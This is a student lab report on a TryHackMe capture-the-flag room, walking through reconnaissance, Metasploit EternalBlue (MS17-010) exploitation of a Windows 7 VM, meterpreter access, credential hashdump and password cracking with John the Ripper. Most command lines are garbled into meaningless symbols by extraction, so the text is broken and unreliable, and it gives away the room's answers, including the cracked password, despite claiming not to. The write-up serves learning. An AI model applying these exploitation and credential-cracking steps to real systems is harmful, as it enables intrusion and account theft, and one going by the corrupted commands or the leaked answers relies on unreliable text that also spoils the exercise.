1
EternalBlue Exploitation Lab Report
By Nvpie
5th Nov 2022
From: Tryhackme.com
NO #!FLAGS REVEALED
2
Table of Contents
1. Executive Summary......................................................................................................................................................4
1.1 Scope of work........................................................................................................................................................4
1.2 Project objectives..................................................................................................................................................4
1.3 Assumption............................................................................................................................................................4
1.4 Timeline..................................................................................................................................................................5
2. Methodology.................................................................................................................................................................5
2.1 Recon (Reconnaissance).......................................................................................................................................5
2.2 Scanning.................................................................................................................................................................6
2.3. Gaining Access:.....................................................................................................................................................6
2.4. Privilege Escalation:.............................................................................................................................................6
2.5. Cracking:................................................................................................................................................................6
3. Recon..............................................................................................................................................................................7
3.1 Scan Results...........................................................................................................................................................7
3.2 Detail System Information...................................................................................................................................7
3.3 Vulnerability Assessment.....................................................................................................................................8
4. Gain Access....................................................................................................................................................................8
4.2 Step 2: Load EternalBlue Module........................................................................................................................8
4.3 Step 3: Check "Info"..............................................................................................................................................9
4.4 Step 4: Set the payload.......................................................................................................................................10
4.5 Step 5: Set options..............................................................................................................................................11
4.6 Step 6: Run Exploit..............................................................................................................................................13
5. Escalation....................................................................................................................................................................14
6. Cracking.......................................................................................................................................................................15
7. Reporting.....................................................................................................................................................................17
7. References:..................................................................................................................................................................18
3
1. Executive Summary
1.1 Scope of work
1. The assessment was carried out from CTF Perspective, with the only supplied information
being the tested VMs IP address.
2. The host machine was being Kali Linux VM and target was Windows 7 Professional SP1 VM
192.168.43.180 address.
3. Perform the penetration and answering the question.
1.2 Project objectives
1. This security assessment is carried out to demonstrate the EternalBlue exploit on a vulnerable
vm with ms17-010 vulnerability.
2. Finding the answers of these questions:
#$! Questions
1. How many ports are open with a port number under 1000?
2. What is the machine vulnerable to?
3. What is the non-default user?
4. What is the cracked password?
1.3 Assumption
1. While performing this lab we assumed that VM is has unpatched MS17-010 vulnerability.
2. Both machines have working internet connection and connected in same network and they can
talk to each other.
1.4 Timeline
The timeline of the Lab is as below:
Penetration Testing Start Date End Date
EternalBlue Exploitation 17/09/2022 17/09/2022
4
2. Methodology
We are going to use the usual methodology.
RECON
GAINING ACCESS
ESCALATE
CRACKING
2.1 Recon (Reconnaissance)
This is the very first stage of hacking, where attacker does as much as possible research about the
target. It is also known as footprinting. Which include three main points.
1. Network
2. Host
3. People involved
There are two types of Footprinting:
Active: Directly interacting with the target to gather information about the target. Eg. Using
Nmap tool to scan the target.
Passive: Trying to collect the information about the target without directly accessing the
target. This involves collecting information from social media, public websites etc.
2.2 Scanning
There are three types of scanning are involved:
Port scanning: This phase involves scanning the target for the information like open ports,
Live systems, various services running on the host.
Vulnerability Scanning: Checking the target for weaknesses or vulnerabilities which can be
exploited. Usually done with help of automated tools.
5
Network Mapping: Finding the topology of network, routers, firewalls servers if any, and
host information and drawing a network diagram with the available information. This map
may serve as a valuable piece of information throughout the hacking process.
2.3. Gaining Access:
This phase is where an attacker breaks into the system/network using various tools or methods.
After entering into a system, he has to increase his privilege to administrator level so he can install
an application he needs or modify data or hide data.
2.4. Privilege Escalation:
Once hackers have infiltrated a server or PC, it is common to immediately try to get higher-level
permissions on that machine. This is called privilege escalation and serves two purposes.
First, the hacker can establish a new account as the server administrator with a unique ID and
password. This allows the hacker to simply log in for access on the next visit, rather than trying to
inject malware each time.
2.5. Cracking:
After getting higher privilege a hacker might wants to crack the password of user of the machine
so he can log into the target machine whenever he if he wants without the knowledge of the user
or worse change the password and leaving user locked out.
He can use bruteforcing, dictionary attack, social engineering or decrypting the hash of password
if he get access to them. There popular password cracking tool called john the ripper which
automate the password cracking this can be very helpful in our lab.
3. Recon
Scan the machine for vulnerabilities with script to finding known vulnerabilities.
!
6
3.1 Scan Results
3.2 Detail System Information
IP ADDRESS SYSTEM
TYPE
OS
INFORMATION
OPEN PORTS
192.168.43.180 Virtual
Machine
Microsoft
Windows 7
Professional
Service Pack 1
Port Protocol Service Version
135 TCP msrpc Microsoft Windows RPC
139 TCP netbios-ssn Microsoft Windows
netbios-ssn
445 TCP Microsoft-ds Microsoft Windows 7 -
10 microsoft-ds
(workgroup:
WORKGROUP)
49152 TCP msrpc Microsoft Windows RPC
49153 TCP msrpc Microsoft Windows RPC
49154 TCP msrpc Microsoft Windows RPC
49155 TCP msrpc Microsoft Windows RPC
49156 TCP msrpc Microsoft Windows RPC
3.3 Vulnerability Assessment
8 Open Ports: "# #"#"#" #"#""#"
1 Vulnerability:$!!
7
CVE-ID:%&!!
CVSS v3.1 Base Score:
SEVERITY:'()
IMPACT: *++++,++$-./0.1
MITIGATION: https://technet.microsoft.com/library/security/ms17-010
4. Gain Access
Now we found the vulnerability we can access the target using the exploit.
4.1 Step 1: Starting up Metasploit Console
The first step, as always, is to fire up Kali and start the Metasploit console.
23/+
4.2 Step 2: Load EternalBlue Module
Once you have the "msf >" prompt, you are ready to start exploiting your target system. We need
to first load the EternalBlue exploit module into the Metasploit console. We can do this by
entering:
23+)!!
Once we found we have +,44$43!!3++$+ installed we can use
that for exploitation.
8
23++,44$43!!3++$+
Now that EternalBlue module is loaded we can use it to perform our exploit.
4.3 Step 3: Check "Info"
To know more about module, we can use `/` command to display the information about how
the module works.
9
As you can see above, Metasploit provides us with some basic information (Name, Platform,
Privileged, Rank, etc.) on the module at the top, some options in the middle and a description of
the module at bottom.
4.4 Step 4: Set the payload
Now that we have loaded our module and have some basic information on it, it is time to select a
payload to work with it. To see all the payloads that will work with this module, you can enter:
23)-
It's important to note that the "show payloads" command run after selecting the exploit will only
show you the payloads that will work with that exploit. If you run it before selecting your exploit, it
will show you ALL the payloads.
In this example, I will be using our tried and true “4,4++++4+++3”
payload, but you can use any of the others that appear on your payload list. If we are successful
with this payload, it will provide us with a Windows command shell on our target system.
10
23+-4,4++++4+++3
4.5 Step 5: Set options
The last step before we exploit is to set our options. To see available options with this exploit and
payload combination, enter:
23)
As you can see, there are numerous options, but the only options we need to set are LHOST (our
IP) and the RHOST (the target IP) along with the LPORT and RPORT.
23+*'5060 !
23+*75*6"
23+8'506 !
23+875*6
After setting those options, let's once again check the options to make certain everything was
typed properly and that everything we need is set.
23)
11
4.6 Step 6: Run Exploit
Now that we have all options set up, we can run the exploit.
Using either “ or “+,” command
23+,
12
As you can see above, Metasploit and EternalBlue are attempted to exploit the Windows 7 SMB
protocol. Down below you can see that Metasploit reports back that we are successful and we
received a Windows command prompt on the target system. Success!
We Got WIN!
It means we successfully exploited the target machine.
We got the meterpreter shell and now we can use metasploit’s specifically designed commands to
interact with target system which can be found through `)+` command.
13
5. Escalation
To verify that we are now on the Windows system, let's type "-/" to see whether it displays
target system information.
23-/
You can see now we are inside the target machine and it displaying h+9:57%;509
<;)9,#+ information.
We can perform various attacks on tasks on target.
Example: - Taking a screenshot of targets desktop
23++)
Such various kinds of attacks can be access through `)+` command.
14
6. Cracking
Now we need to find password of user Jon for that we use hashdump command:
23))
Copy the line from “:=>9?=and save it inside file and name it as “))”.
We need to find out the which hash format is this with hashid command.
23))@))2
Now that we know it is NT hash format, we can use it to decrypt the hash and get our password
through command called john.
23A)/B-,@/++2
Now that we got the password which is C/of the user Awe can log into the system
and leave a message to user to let him know he’s been hacked and the patching method for it.
15
7. Reporting
Collecting all the necessary screenshots and compiling the detailed report of Eternalblue
exoloitation Lab.
We have collected all the information and compiled it into this report.
Let's recall all the questions that we asked at the beginning.
#$! Questions and Answers
1. How many ports are open with a port number under 1000?
Ans: 3 Ports, which were: 135, 139, 445.
2. What is the machine vulnerable to?
Ans: 0
3. What is the non-default user?
Ans: jon
4. What is the cracked password?
Ans: alqfna22
16
7. References:
1. Exploit-db database 'EternalBlue' SMB Remote Code Execution (MS17-010)
https://www.exploit-db.com/exploits/42315
2. Eternal Blue (MS17-010) vulnerability attack experiment
https://programmersought.com/article/56866337746/
3. EternalBlue Exploit: What It Is And How It Works
https://www.sentinelone.com/blog/eternalblue-nsa-developed-exploit-just-wont-die/
4. Manually Exploit EternalBlue on Windows Server Using MS17-010 Python Exploit
https://null-byte.wonderhowto.com/how-to/manually-exploit-eternalblue-windows-server-using-ms17-010-
python-exploit-0195414/
5. MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue/
6. NATIONAL VULNERABILITY DATABASE - CVE-2017-0144 Detail
https://nvd.nist.gov/vuln/detail/CVE-2017-0144
7. Tryhackme.com CTF room for EternalBlue exploit
https://tryhackme.com/room/blue
17
